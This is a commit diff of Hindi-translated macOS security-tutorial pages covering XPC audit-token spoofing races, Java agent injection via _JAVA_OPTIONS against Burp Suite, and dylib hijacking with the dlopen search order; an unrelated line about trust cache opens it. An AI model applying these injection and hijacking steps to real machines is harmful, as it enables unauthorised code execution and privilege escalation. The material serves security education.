ट्रस्टकैश एक रक्षात्मक विधि है जो Apple सिलिकॉन मशीनों में पेश की गई है जो Apple बाइनरी के CDHSAH का एक डेटाबेस संग्रहीत करती है ताकि केवल अनुमत गैर-संशोधित बाइनरी को निष्पादित किया जा सके। जो डाउनग्रेड संस्करणों के निष्पादन को रोकता है।
### कोड उदाहरण

40
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md
View File

@ -12,8 +12,8 @@
../../
{{#endref}}
इस समय याद रखें कि ([यहा से परिभाषा](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing)):\
Mach संदेश एक _mach port_ के माध्यम से भेजे जाते हैं, जो mach kernel में निर्मित एक **एकल रिसीवर, कई प्रेषक संचार** चैनल है। **कई प्रक्रियाएँ संदेश भेज सकती हैं** एक mach port पर, लेकिन किसी भी समय **केवल एकल प्रक्रिया ही इसे पढ़ सकती है**। फ़ाइल वर्णनकर्ताओं और सॉकेट की तरह, mach ports को kernel द्वारा आवंटित और प्रबंधित किया जाता है और प्रक्रियाएँ केवल एक पूर्णांक देखती हैं, जिसका वे kernel को यह बताने के लिए उपयोग कर सकते हैं कि वे अपने किस mach ports का उपयोग करना चाहते हैं।
इस समय याद रखें कि ([यहा से परिभाषा](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing)):\
Mach संदेश एक _mach port_ के माध्यम से भेजे जाते हैं, जो mach kernel में निर्मित एक **एकल रिसीवर, कई प्रेषक संचार** चैनल है। **कई प्रक्रियाएँ संदेश भेज सकती हैं** एक mach port पर, लेकिन किसी भी समय **केवल एकल प्रक्रिया ही इसे पढ़ सकती है**। फ़ाइल वर्णनकर्ताओं और सॉकेट की तरह, mach ports को kernel द्वारा आवंटित और प्रबंधित किया जाता है और प्रक्रियाएँ केवल एक पूर्णांक देखती हैं, जिसका वे उपयोग कर सकते हैं यह इंगित करने के लिए कि वे अपने किस mach ports का उपयोग करना चाहते हैं।
## XPC Connection
@ -31,24 +31,24 @@ Mach संदेश एक _mach port_ के माध्यम से भे
- एक XPC कनेक्शन का ऑडिट टोकन **हाल ही में प्राप्त संदेश से कॉपी किया गया ऑडिट टोकन** है।
- एक XPC कनेक्शन का **ऑडिट टोकन** प्राप्त करना कई **सुरक्षा जांचों** के लिए महत्वपूर्ण है।
हालांकि पिछली स्थिति आशाजनक लगती है, कुछ परिदृश्य हैं जहाँ यह समस्याएँ उत्पन्न नहीं करेगा ([यहाँ से](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing)):
हालांकि पिछली स्थिति आशाजनक लगती है, कुछ परिदृश्य हैं जहां यह समस्याएँ उत्पन्न नहीं करेगा ([यहां से](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing)):
- ऑडिट टोकन अक्सर एक प्राधिकरण जांच के लिए उपयोग किए जाते हैं यह तय करने के लिए कि कनेक्शन स्वीकार करना है या नहीं। चूंकि यह सेवा पोर्ट पर एक संदेश का उपयोग करके होता है, इसलिए **अभी तक कोई कनेक्शन स्थापित नहीं हुआ है**। इस पोर्ट पर अधिक संदेश केवल अतिरिक्त कनेक्शन अनुरोधों के रूप में संभाले जाएंगे। इसलिए कनेक्शन स्वीकार करने से पहले कोई भी **जांचें कमजोर नहीं है** (इसका मतलब यह भी है कि `-listener:shouldAcceptNewConnection:` के भीतर ऑडिट टोकन सुरक्षित है)। इसलिए हम **विशिष्ट क्रियाओं की पुष्टि करने वाले XPC कनेक्शनों की तलाश कर रहे हैं**
- ऑडिट टोकन अक्सर एक प्राधिकरण जांच के लिए उपयोग किए जाते हैं यह तय करने के लिए कि कनेक्शन स्वीकार करना है या नहीं। चूंकि यह सेवा पोर्ट पर एक संदेश का उपयोग करके होता है, इसलिए **अभी तक कोई कनेक्शन स्थापित नहीं हुआ है**। इस पोर्ट पर अधिक संदेश केवल अतिरिक्त कनेक्शन अनुरोधों के रूप में संभाले जाएंगे। इसलिए कनेक्शन स्वीकार करने से पहले कोई भी **जांच कमजोर नहीं है** (इसका मतलब यह भी है कि `-listener:shouldAcceptNewConnection:` के भीतर ऑडिट टोकन सुरक्षित है)। इसलिए हम **विशिष्ट क्रियाओं की पुष्टि करने वाले XPC कनेक्शनों की तलाश कर रहे हैं**
- XPC इवेंट हैंडलर समकालिक रूप से संभाले जाते हैं। इसका मतलब है कि एक संदेश के लिए इवेंट हैंडलर को अगले के लिए कॉल करने से पहले पूरा किया जाना चाहिए, यहां तक कि समवर्ती डिस्पैच कतारों पर भी। इसलिए एक **XPC इवेंट हैंडलर के भीतर ऑडिट टोकन को अन्य सामान्य (गैर-प्रतिक्रिया!) संदेशों द्वारा अधिलेखित नहीं किया जा सकता**
यह दो अलग-अलग तरीकों से शोषण किया जा सकता है:
1. Variant1:
- **शोषण** **सेवा** **A** और सेवा **B** से **जुड़ता है**
- सेवा **B** सेवा A में एक **विशिष्ट कार्यक्षमता** को कॉल कर सकत है जिसे उपयोगकर्ता नहीं कर सकता
- सेवा **A** **`xpc_connection_get_audit_token`** को कॉल करत है जबकि _**नहीं**_ एक कनेक्शन के लिए **इवेंट हैंडलर** के भीतर एक **`dispatch_async`** में।
- इसलिए एक **अलग** संदेश **ऑडिट टोकन को अधिलेखित** कर सकता है क्योंकि इसे इवेंट हैंडलर के बाहर असंक्रमित रूप से भेजा जा रहा है।
- सेवा **B** सेवा A में एक **विशिष्ट कार्यक्षमता** को कॉल कर सकत है जिसे उपयोगकर्ता नहीं कर सकता
- सेवा **A** **`xpc_connection_get_audit_token`** को कॉल करत है जबकि _**नहीं**_ एक कनेक्शन के लिए **इवेंट हैंडलर** के भीतर एक **`dispatch_async`** में।
- इसलिए एक **अलग** संदेश **ऑडिट टोकन को अधिलेखित कर सकता है** क्योंकि इसे इवेंट हैंडलर के बाहर असमय भेजा जा रहा है।
- शोषण **सेवा B को सेवा A के लिए SEND अधिकार** देता है।
- इसलिए svc **B** वास्तव में सेवा **A** को **संदेश भेजगा**।
- इसलिए svc **B** वास्तव में सेवा **A** को **संदेश भेज रहा होगा**।
- **शोषण** **विशिष्ट क्रिया को कॉल करने की कोशिश करता है।** एक RC svc **A** इस **क्रिया** के प्राधिकरण की **जांच** करता है जबकि **svc B ने ऑडिट टोकन को अधिलेखित किया** (शोषण को विशेष क्रिया को कॉल करने की अनुमति देता है)।
2. Variant 2:
- सेवा **B** सेवा A में एक **विशिष्ट कार्यक्षमता** को कॉल कर सकत है जिसे उपयोगकर्ता नहीं कर सकता
- शोषण **सेवा A** से जुड़ता है जो **शोषण** को एक **संदेश भेजता है जो एक प्रतिक्रिया की अपेक्षा करता है** एक विशिष्ट **प्रतिक्रिया** **पोर्ट** में।
- सेवा **B** सेवा A में एक **विशिष्ट कार्यक्षमता** को कॉल कर सकत है जिसे उपयोगकर्ता नहीं कर सकता
- शोषण **सेवा A** से जुड़ता है जो **एक संदेश भेजता है जो एक प्रतिक्रिया की अपेक्षा करता है** एक विशिष्ट **प्रतिक्रिया** **पोर्ट** में।
- शोषण **सेवा** B को एक संदेश भेजता है जो **उस प्रतिक्रिया पोर्ट** को पारित करता है।
- जब सेवा **B प्रतिक्रिया देती है**, यह **संदेश सेवा A को भेजती है**, **जबकि** **शोषण** सेवा A को एक अलग **संदेश भेजता है** जो **विशिष्ट कार्यक्षमता** तक पहुँचने की कोशिश कर रहा है और उम्मीद कर रहा है कि सेवा B से प्रतिक्रिया ऑडिट टोकन को सही समय पर अधिलेखित करेगी (रेस कंडीशन)।
@ -58,8 +58,8 @@ Mach संदेश एक _mach port_ के माध्यम से भे
- दो mach सेवाएँ **`A`** और **`B`** जिनसे हम दोनों कनेक्ट कर सकते हैं (सैंडबॉक्स प्रोफ़ाइल और कनेक्शन स्वीकार करने से पहले प्राधिकरण जांच के आधार पर)।
- _**A**_ को एक **विशिष्ट क्रिया** के लिए एक **प्राधिकरण जांच** होनी चाहिए जिसे **`B`** पारित कर सकता है (लेकिन हमारा ऐप नहीं)।
- उदाहरण के लिए, यदि B के पास कुछ **अधिकार** हैं या यह **रूट** के रूप में चल रहा है, तो यह उसे A से एक विशेष क्रिया करने के लिए पूछने की अनुमति दे सकता है।
- इस प्राधिकरण जांच के लिए, **`A`** असंक्रमित रूप से ऑडिट टोकन प्राप्त करता है, उदाहरण के लिए `dispatch_async` से **`xpc_connection_get_audit_token`** को कॉल करके।
- उदाहरण के लिए, यदि B के पास कुछ **अधिकार** हैं या यह **रूट** के रूप में चल रहा है, तो यह उसे A से एक विशेष क्रिया करने के लिए कहने की अनुमति दे सकता है।
- इस प्राधिकरण जांच के लिए, **`A`** असमय ऑडिट टोकन प्राप्त करता है, उदाहरण के लिए `dispatch_async` से **`xpc_connection_get_audit_token`** को कॉल करके।
> [!CAUTION]
> इस मामले में एक हमलावर एक **रेस कंडीशन** को ट्रिगर कर सकता है जिससे एक **शोषण** होता है जो **A से एक क्रिया करने के लिए** कई बार पूछता है जबकि **B `A` को संदेश भेजता है**। जब RC **सफल** होता है, तो **B** का **ऑडिट टोकन** मेमोरी में कॉपी किया जाएगा **जबकि** हमारे **शोषण** का अनुरोध A द्वारा **संभाला** जा रहा है, जिससे इसे **विशेष क्रिया तक पहुँचने की अनुमति मिलती है जिसे केवल B अनुरोध कर सकता था**
@ -70,9 +70,9 @@ Mach संदेश एक _mach port_ के माध्यम से भे
हमले को करने के लिए:
1. मानक XPC प्रोटोकॉल का उपयोग करके `smd` नामक सेवा से एक **कनेक्शन** प्रारंभ करें।
2. `diagnosticd` से एक द्वितीयक **कनेक्शन** बनाएं। सामान्य प्रक्रिया के विपरीत, दो नए mach ports बनाने और भेजने के बजाय, क्लाइंट पोर्ट भेजने के अधिकार को **smd** कनेक्शन से जुड़े **send right** की एक डुप्लिकेट के साथ प्रतिस्थापित किया जाता है।
3. परिणामस्वरूप, XPC संदेश `diagnosticd` को भेजे जा सकते हैं, लेकिन `diagnosticd` से प्रतिक्रियाएँ `smd` पर पुनः मार्गित की जाती हैं। `smd` के लिए, ऐसा प्रतीत होता है कि उपयोगकर्ता और `diagnosticd` दोनों से संदेश एक ही कनेक्शन से उत्पन्न हो रहे हैं।
1. मानक XPC प्रोटोकॉल का उपयोग करके `smd` नामक सेवा से **कनेक्शन** प्रारंभ करें।
2. `diagnosticd` से एक द्वितीयक **कनेक्शन** बनाएं। सामान्य प्रक्रिया के विपरीत, दो नए mach ports बनाने और भेजने के बजाय, क्लाइंट पोर्ट भेजने के अधिकार को `smd` कनेक्शन से जुड़े **send right** की एक डुप्लिकेट के साथ प्रतिस्थापित किया जाता है।
3. परिणामस्वरूप, XPC संदेश `diagnosticd` को भेजे जा सकते हैं, लेकिन `diagnosticd` से प्रतिक्रियाएँ `smd` को पुनः मार्गित की जाती हैं। `smd` के लिए, ऐसा प्रतीत होता है कि उपयोगकर्ता और `diagnosticd` दोनों से संदेश एक ही कनेक्शन से उत्पन्न हो रहे हैं।
![Image depicting the exploit process](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/exploit.png)
@ -81,17 +81,17 @@ Mach संदेश एक _mach port_ के माध्यम से भे
## Variant 2: reply forwarding
एक XPC (क्रॉस-प्रोसेस संचार) वातावरण में, हालांकि इवेंट हैंडलर समवर्ती रूप से निष्पादित नहीं होते हैं, प्रतिक्रिया संदेशों को संभालने का एक अनूठा व्यवहार होता है। विशेष रूप से, प्रतिक्रिया की अपेक्षा करने वाले संदेश भेजने के लिए दो अलग-अलग तरीके हैं:
एक XPC (क्रॉस-प्रोसेस संचार) वातावरण में, हालांकि इवेंट हैंडलर समवर्ती रूप से निष्पादित नहीं होते हैं, प्रतिक्रिया संदेशों को संभालने का एक अनूठा व्यवहार होता है। विशेष रूप से, संदेश भेजने के लिए दो अलग-अलग तरीके हैं जो एक प्रतिक्रिया की अपेक्षा करते हैं:
1. **`xpc_connection_send_message_with_reply`**: यहाँ, XPC संदेश को एक निर्दिष्ट कतार पर प्राप्त और संसाधित किया जाता है।
2. **`xpc_connection_send_message_with_reply_sync`**: इसके विपरीत, इस विधि में, XPC संदेश को वर्तमान डिस्पैच कतार पर प्राप्त और संसाधित किया जाता है।
यह भेद महत्वपूर्ण है क्योंकि यह **प्रतिक्रिया पैकेटों के इवेंट हैंडलर के निष्पादन के साथ समवर्ती रूप से पार्स होने की संभावना** की अनुमति देता है। विशेष रूप से, जबकि `_xpc_connection_set_creds` आंशिक रूप से ऑडिट टोकन के अधिलेखन से बचाने के लिए लॉकिंग लागू करता है, यह पूरे कनेक्शन ऑब्जेक्ट के लिए इस सुरक्षा को नहीं बढ़ाता है। परिणामस्वरूप, यह एक कमजोर स्थिति उत्पन्न करता है जहाँ ऑडिट टोकन को एक पैकेट के पार्सिंग और इसके इवेंट हैंडलर के निष्पादन के बीच के अंतराल के दौरान प्रतिस्थापित किया जा सकता है।
यह भेद महत्वपूर्ण है क्योंकि यह **प्रतिक्रिया पैकेटों के XPC इवेंट हैंडलर के निष्पादन के साथ समवर्ती रूप से पार्स होने की संभावना** की अनुमति देता है। विशेष रूप से, जबकि `_xpc_connection_set_creds` आंशिक रूप से ऑडिट टोकन के अधिलेखन से बचाने के लिए लॉकिंग लागू करता है, यह पूरे कनेक्शन ऑब्जेक्ट के लिए इस सुरक्षा को नहीं बढ़ाता है। परिणामस्वरूप, यह एक कमजोर स्थिति उत्पन्न करता है जहाँ ऑडिट टोकन को एक पैकेट के पार्सिंग और इसके इवेंट हैंडलर के निष्पादन के बीच के अंतराल के दौरान प्रतिस्थापित किया जा सकता है।
इस कमजोर स्थिति का शोषण करने के लिए, निम्नलिखित सेटअप की आवश्यकता है:
- दो mach सेवाएँ, जिन्हें **`A`** और **`B`** कहा जाता है, जिनसे कनेक्शन स्थापित किया जा सकता है
- सेवा **`A`** को एक विशिष्ट क्रिया के लिए एक प्राधिकरण जांच शामिल करनी चाहिए जिसे केवल **`B`** कर सकता है (उपयोगकर्ता का ऐप नहीं कर सकता)।
- दो mach सेवाएँ, जिन्हें **`A`** और **`B`** कहा जाता है, जिनसे दोनों कनेक्शन स्थापित कर सकते हैं
- सेवा **`A`** को एक विशिष्ट क्रिया के लिए एक प्राधिकरण जांच शामिल करनी चाहिए जिसे केवल **`B`** कर सकता है (उपयोगकर्ता का ऐप नहीं)।
- सेवा **`A`** को एक संदेश भेजना चाहिए जो एक प्रतिक्रिया की अपेक्षा करता है।
- उपयोगकर्ता **`B`** को एक संदेश भेज सकता है जिसका वह उत्तर देगा।
@ -116,7 +116,7 @@ Mach संदेश एक _mach port_ के माध्यम से भे
## The fix <a href="#the-fix" id="the-fix"></a>
- **रिपोर्ट की गई समस्याएँ**: `smd` के भीतर पाए गए सामान्य और विशिष्ट मुद्दों का विवरण देते हुए Apple को एक रिपोर्ट प्रस्तुत की गई।
- **रिपोर्ट की गई समस्याएँ**: Apple को `smd` के भीतर पाए गए सामान्य और विशिष्ट मुद्दों का विवरण देने वाली एक रिपोर्ट प्रस्तुत की गई।
- **Apple की प्रतिक्रिया**: Apple ने `smd` में समस्या को संबोधित किया, `xpc_connection_get_audit_token` को `xpc_dictionary_get_audit_token` से प्रतिस्थापित किया।
- **फिक्स की प्रकृति**: `xpc_dictionary_get_audit_token` फ़ंक्शन को सुरक्षित माना जाता है क्योंकि यह प्राप्त XPC संदेश से जुड़े mach संदेश से सीधे ऑडिट टोकन प्राप्त करता है। हालाँकि, यह सार्वजनिक API का हिस्सा नहीं है, जैसे `xpc_connection_get_audit_token`
- **व्यापक फिक्स की अनुपस्थिति**: यह स्पष्ट नहीं है कि Apple ने कनेक्शन के सहेजे गए ऑडिट टोकन के साथ मेल न खाने वाले संदेशों को अस्वीकार करने जैसे अधिक व्यापक फिक्स को लागू क्यों नहीं किया। कुछ परिदृश्यों (जैसे, `setuid` का उपयोग) में वैध ऑडिट टोकन परिवर्तनों की संभावना एक कारक हो सकती है।

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md
View File

@ -85,7 +85,7 @@ open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Profession
> [!CAUTION]
> एजेंट को **विभिन्न Java संस्करण** के साथ बनाना एजेंट और एप्लिकेशन दोनों के निष्पादन को क्रैश कर सकता है
जहा एजेंट हो सकता है:
जहा एजेंट हो सकता है:
```java:Agent.java
import java.io.*;
import java.lang.instrument.*;
@ -114,7 +114,7 @@ Agent-Class: Agent
Can-Redefine-Classes: true
Can-Retransform-Classes: true
```
और फिर env वेरिएबल को एक्सपोर्ट करें और java एप्लिकेशन को इस तरह चलाएँ:
और फिर env वेरिएबल को एक्सपोर्ट करें और जावा एप्लिकेशन को इस तरह चलाएँ:
```bash
export _JAVA_OPTIONS='-javaagent:/tmp/j/Agent.jar'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"

40
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md
View File

@ -17,7 +17,7 @@ macos-dyld-process.md
यह [**LD_PRELOAD on Linux**](../../../../linux-hardening/privilege-escalation/#ld_preload) की तरह है। यह एक प्रक्रिया को इंगित करने की अनुमति देता है जो चलने वाली है कि एक विशेष लाइब्रेरी को एक पथ से लोड किया जाए (यदि env var सक्षम है)।
यह तकनीक **ASEP तकनीक के रूप में भी उपयोग की जा सकती है** क्योंकि हर स्थापित एप्लिकेशन में "Info.plist" नामक एक plist होती है जो **पर्यावरणीय चर असाइन करने** की अनुमति देती है, जिसका उपयोग `LSEnvironmental` नामक कुंजी से किया जाता है।
यह तकनीक **ASEP तकनीक के रूप में भी उपयोग की जा सकती है** क्योंकि हर स्थापित एप्लिकेशन में "Info.plist" नामक एक plist होती है जो **पर्यावरणीय चर असाइन करने** की अनुमति देती है, जिसका कुंजी `LSEnvironmental` है।
> [!NOTE]
> 2012 से **Apple ने `DYLD_INSERT_LIBRARIES`** की **शक्ति को काफी कम कर दिया है**
@ -44,7 +44,7 @@ macos-dyld-process.md
या बाइनरी में **हर्डनड रनटाइम फ्लैग** या **लाइब्रेरी मान्यता फ्लैग** नहीं होना चाहिए।
आप यह जांच सकते हैं कि क्या बाइनरी में **हर्डनड रनटाइम** है `codesign --display --verbose <bin>` के साथ, **`CodeDirectory`** में फ्लैग रनटाइम की जांच करते हुए जैसे: **`CodeDirectory v=20500 size=767 flags=0x10000(runtime) hashes=13+7 location=embedded`**
आप यह जांच सकते हैं कि क्या बाइनरी में **हर्डनड रनटाइम** है `codesign --display --verbose <bin>` के साथ, **`CodeDirectory`** में फ्लैग रनटाइम की जांच करते हुए: **`CodeDirectory v=20500 size=767 flags=0x10000(runtime) hashes=13+7 location=embedded`**
आप एक लाइब्रेरी को भी लोड कर सकते हैं यदि यह **बाइनरी के समान प्रमाणपत्र से हस्ताक्षरित है**
@ -60,7 +60,7 @@ macos-dyld-hijacking-and-dyld_insert_libraries.md
> याद रखें कि **पिछले लाइब्रेरी मान्यता प्रतिबंध भी लागू होते हैं** Dylib हाइजैकिंग हमलों को करने के लिए।
Windows की तरह, MacOS में आप भी **dylibs को हाइजैक** कर सकते हैं ताकि **एप्लिकेशन** **मनमाने** **कोड** को **निष्पादित** कर सकें (ठीक है, वास्तव में एक सामान्य उपयोगकर्ता के लिए यह संभव नहीं हो सकता क्योंकि आपको एक `.app` बंडल के अंदर लिखने के लिए TCC अनुमति की आवश्यकता हो सकती है और एक लाइब्रेरी को हाइजैक करना)।\
हालांकि, **MacOS** एप्लिकेशन **लाइब्रेरी** को लोड करने का तरीका **Windows की तुलना में अधिक प्रतिबंधित** है। इसका मतलब है कि **मैलवेयर** डेवलपर्स अभी भी **स्टेल्थ** के लिए इस तकनीक का उपयोग कर सकते हैं, लेकिन **अधिकारों को बढ़ाने के लिए इसका दुरुपयोग करने की संभावना बहुत कम है**
हालांकि, **MacOS** एप्लिकेशन **लाइब्रेरी** को लोड करने का तरीका **Windows की तुलना में अधिक प्रतिबंधित** है। इसका मतलब है कि **मैलवेयर** डेवलपर्स अभी भी इस तकनीक का उपयोग **स्टेल्थ** के लिए कर सकते हैं, लेकिन **अधिकारों को बढ़ाने के लिए इसका दुरुपयोग करने की संभावना बहुत कम है**
सबसे पहले, यह **अधिक सामान्य** है कि **MacOS बाइनरी लाइब्रेरी को लोड करने के लिए पूर्ण पथ** को इंगित करती हैं। और दूसरा, **MacOS कभी भी लाइब्रेरी के लिए **$PATH** के फ़ोल्डरों में खोज नहीं करता है।
@ -76,7 +76,7 @@ Windows की तरह, MacOS में आप भी **dylibs को हा
हालांकि, **dylib हाइजैकिंग** के **2 प्रकार** हैं:
- **गायब कमजोर लिंक की गई लाइब्रेरी**: इसका मतलब है कि एप्लिकेशन एक लाइब्रेरी लोड करने की कोशिश करेगा जो **LC_LOAD_WEAK_DYLIB** के साथ कॉन्फ़िगर की गई नहीं है। फिर, **यदि एक हमलावर एक dylib को उस स्थान पर रखता है जहां इसे लोड करने की उम्मीद है**
- लिंक "कमजोर" होने का मतलब है कि एप्लिकेशन तब भी चलना जारी रखेगा जब लाइब्रेरी नहीं पाई जाती।
- लिंक "कमजोर" होने का मतलब है कि एप्लिकेशन तब भी चलना जारी रखेगा जब लाइब्रेरी नहीं मिलेगी।
- इस से संबंधित **कोड** `ImageLoaderMachO::doGetDependentLibraries` फ़ंक्शन में है `ImageLoaderMachO.cpp` जहां `lib->required` केवल तब `false` है जब `LC_LOAD_WEAK_DYLIB` सत्य है।
- बाइनरी में **कमजोर लिंक की गई लाइब्रेरी** खोजें (आपके पास बाद में हाइजैकिंग लाइब्रेरी बनाने का एक उदाहरण है):
- ```bash
@ -97,10 +97,10 @@ compatibility version 1.0.0
>
> **`@loader_path`**: यह **लोड कमांड** को समाहित करने वाले **Mach-O बाइनरी** के **निर्देशिका** का **पथ** है।
>
> - जब एक निष्पादन योग्य में उपयोग किया जाता है, तो **`@loader_path`** प्रभावी रूप से **`@executable_path`** के समान होता है।
> - जब एक **dylib** में उपयोग किया जाता है, तो **`@loader_path`** **dylib** का **पथ** देता है।
> - जब एक निष्पादन योग्य में उपयोग किया जाता है, **`@loader_path`** प्रभावी रूप से **`@executable_path`** के समान है।
> - जब एक **dylib** में उपयोग किया जाता है, **`@loader_path`** **dylib** का **पथ** देता है।
इस कार्यक्षमता का **दुरुपयोग** करके **अधिकारों को बढ़ाने** का तरीका तब होगा जब एक **एप्लिकेशन** जो **रूट** द्वारा **निष्पादित** किया जा रहा है, किसी **निर्देशिका में लाइब्रेरी की तलाश कर रहा है जहां हमलावर के पास लिखने की अनुमति है।**
इस कार्यक्षमता का **दुरुपयोग करके अधिकारों को बढ़ाने** का तरीका तब होगा जब एक **एप्लिकेशन** जो **रूट** द्वारा **निष्पादित** किया जा रहा है, किसी **निर्देशिका में किसी लाइब्रेरी की तलाश कर रहा है जहां हमलावर के पास लिखने की अनुमति है।**
> [!TIP]
> अनुप्रयोगों में **गायब लाइब्रेरी** खोजने के लिए एक अच्छा **स्कैनर** है [**Dylib Hijack Scanner**](https://objective-see.com/products/dhs.html) या एक [**CLI संस्करण**](https://github.com/pandazheng/DylibHijack).\
@ -119,7 +119,7 @@ macos-dyld-hijacking-and-dyld_insert_libraries.md
**`man dlopen`** से:
- जब पथ **स्लैश वर्ण** को शामिल नहीं करता है (यानी यह केवल एक पत्ते का नाम है), **dlopen() खोज करेगा**। यदि **`$DYLD_LIBRARY_PATH`** लॉन्च पर सेट किया गया था, तो dyld पहले **उस निर्देशिका में देखेगा**। अगला, यदि कॉलिंग mach-o फ़ाइल या मुख्य निष्पादन फ़ाइल **`LC_RPATH`** निर्दिष्ट करती है, तो dyld **उन** निर्देशिकाओं में देखेगा। अगला, यदि प्रक्रिया **अप्रतिबंधित** है, तो dyld **वर्तमान कार्यशील निर्देशिका** में खोज करेगा। अंत में, पुराने बाइनरी के लिए, dyld कुछ फॉलबैक का प्रयास करेगा। यदि **`$DYLD_FALLBACK_LIBRARY_PATH`** लॉन्च पर सेट किया गया था, तो dyld उन निर्देशिकाओं में खोज करेगा, अन्यथा, dyld **`/usr/local/lib/`** में देखेगा (यदि प्रक्रिया अप्रतिबंधित है), और फिर **`/usr/lib/`** में (यह जानकारी **`man dlopen`** से ली गई थी)।
- जब पथ **स्लैश वर्ण** को शामिल नहीं करता है (यानी यह केवल एक पत्ते का नाम है), **dlopen() खोज करेगा**। यदि **`$DYLD_LIBRARY_PATH`** लॉन्च पर सेट किया गया था, तो dyld पहले **उस निर्देशिका में देखेगा**। अगला, यदि कॉलिंग mach-o फ़ाइल या मुख्य निष्पादन ने **`LC_RPATH`** निर्दिष्ट किया है, तो dyld **उन** निर्देशिकाओं में देखेगा। अगला, यदि प्रक्रिया **अप्रतिबंधित** है, तो dyld **वर्तमान कार्यशील निर्देशिका** में खोज करेगा। अंत में, पुराने बाइनरी के लिए, dyld कुछ फॉलबैक का प्रयास करेगा। यदि **`$DYLD_FALLBACK_LIBRARY_PATH`** लॉन्च पर सेट किया गया था, तो dyld उन निर्देशिकाओं में खोज करेगा, अन्यथा, dyld **`/usr/local/lib/`** में देखेगा (यदि प्रक्रिया अप्रतिबंधित है), और फिर **`/usr/lib/`** में (यह जानकारी **`man dlopen`** से ली गई थी)।
1. `$DYLD_LIBRARY_PATH`
2. `LC_RPATH`
3. `CWD`(यदि अप्रतिबंधित)
@ -137,7 +137,7 @@ macos-dyld-hijacking-and-dyld_insert_libraries.md
1. `$DYLD_FRAMEWORK_PATH`
2. प्रदान किया गया पथ (यदि अप्रतिबंधित है तो सापेक्ष पथों के लिए वर्तमान कार्यशील निर्देशिका का उपयोग करना)
3. `$DYLD_FALLBACK_FRAMEWORK_PATH`
4. `/Library/Frameworks` (यदि अप्रतिबंधित है)
4. `/Library/Frameworks` (यदि अप्रतिबंधित)
5. `/System/Library/Frameworks`
> [!CAUTION]
@ -145,11 +145,11 @@ macos-dyld-hijacking-and-dyld_insert_libraries.md
>
> - यदि प्रक्रिया **अप्रतिबंधित** है, तो CWD से **सापेक्ष पथ** का दुरुपयोग करते हुए उल्लेखित env चर (यहां तक कि यदि यह दस्तावेज़ों में नहीं कहा गया है यदि प्रक्रिया प्रतिबंधित है तो DYLD_* env vars हटा दिए जाते हैं)
- जब पथ **स्लैश को शामिल करता है लेकिन एक फ्रेमवर्क पथ नहीं है** (यानी एक पूर्ण पथ या dylib के लिए आंशिक पथ), dlopen() पहले (यदि सेट है) **`$DYLD_LIBRARY_PATH`** में देखता है (पथ से पत्ते का भाग)। अगला, dyld **प्रदान किए गए पथ** का प्रयास करता है (सापेक्ष पथों के लिए वर्तमान कार्यशील निर्देशिका का उपयोग करते हुए (लेकिन केवल अप्रतिबंधित प्रक्रियाओं के लिए))। अंत में, पुराने बाइनरी के लिए, dyld फॉलबैक का प्रयास करेगा। यदि **`$DYLD_FALLBACK_LIBRARY_PATH`** लॉन्च पर सेट किया गया था, तो dyld उन निर्देशिकाओं में खोज करेगा, अन्यथा, dyld **`/usr/local/lib/`** में देखेगा (यदि प्रक्रिया अप्रतिबंधित है), और फिर **`/usr/lib/`** में।
- जब पथ **स्लैश को शामिल करता है लेकिन एक फ्रेमवर्क पथ नहीं है** (यानी एक पूर्ण पथ या एक dylib के लिए आंशिक पथ), dlopen() पहले (यदि सेट है) **`$DYLD_LIBRARY_PATH`** में देखता है (पथ से पत्ते का भाग)। अगला, dyld **प्रदान किए गए पथ** का प्रयास करता है (सापेक्ष पथों के लिए वर्तमान कार्यशील निर्देशिका का उपयोग करते हुए (लेकिन केवल अप्रतिबंधित प्रक्रियाओं के लिए))। अंत में, पुराने बाइनरी के लिए, dyld फॉलबैक का प्रयास करेगा। यदि **`$DYLD_FALLBACK_LIBRARY_PATH`** लॉन्च पर सेट किया गया था, तो dyld उन निर्देशिकाओं में खोज करेगा, अन्यथा, dyld **`/usr/local/lib/`** में देखेगा (यदि प्रक्रिया अप्रतिबंधित है), और फिर **`/usr/lib/`** में।
1. `$DYLD_LIBRARY_PATH`
2. प्रदान किया गया पथ (यदि अप्रतिबंधित है तो सापेक्ष पथों के लिए वर्तमान कार्यशील निर्देशिका का उपयोग करना)
3. `$DYLD_FALLBACK_LIBRARY_PATH`
4. `/usr/local/lib/` (यदि अप्रतिबंधित है)
4. `/usr/local/lib/` (यदि अप्रतिबंधित)
5. `/usr/lib/`
> [!CAUTION]
@ -160,11 +160,11 @@ macos-dyld-hijacking-and-dyld_insert_libraries.md
> [!NOTE]
> नोट: **dlopen खोज** को **नियंत्रित करने** के लिए कोई कॉन्फ़िगरेशन फ़ाइलें नहीं हैं।
>
> नोट: यदि मुख्य निष्पादन योग्य एक **set\[ug]id बाइनरी या अधिकारों के साथ कोडसाइन किया गया है**, तो **सभी पर्यावरण चर अनदेखा कर दिए जाते हैं**, और केवल एक पूर्ण पथ का उपयोग किया जा सकता है ([DYLD_INSERT_LIBRARIES प्रतिबंधों की जांच करें](macos-dyld-hijacking-and-dyld_insert_libraries.md#check-dyld_insert_librery-restrictions) अधिक विस्तृत जानकारी के लिए)
> नोट: यदि मुख्य निष्पादन **set\[ug]id बाइनरी या अधिकारों के साथ कोडसाइन** है, तो **सभी पर्यावरण चर अनदेखा कर दिए जाते हैं**, और केवल एक पूर्ण पथ का उपयोग किया जा सकता है ([DYLD_INSERT_LIBRARIES प्रतिबंधों की जांच करें](macos-dyld-hijacking-and-dyld_insert_libraries.md#check-dyld_insert_librery-restrictions) अधिक विस्तृत जानकारी के लिए)
>
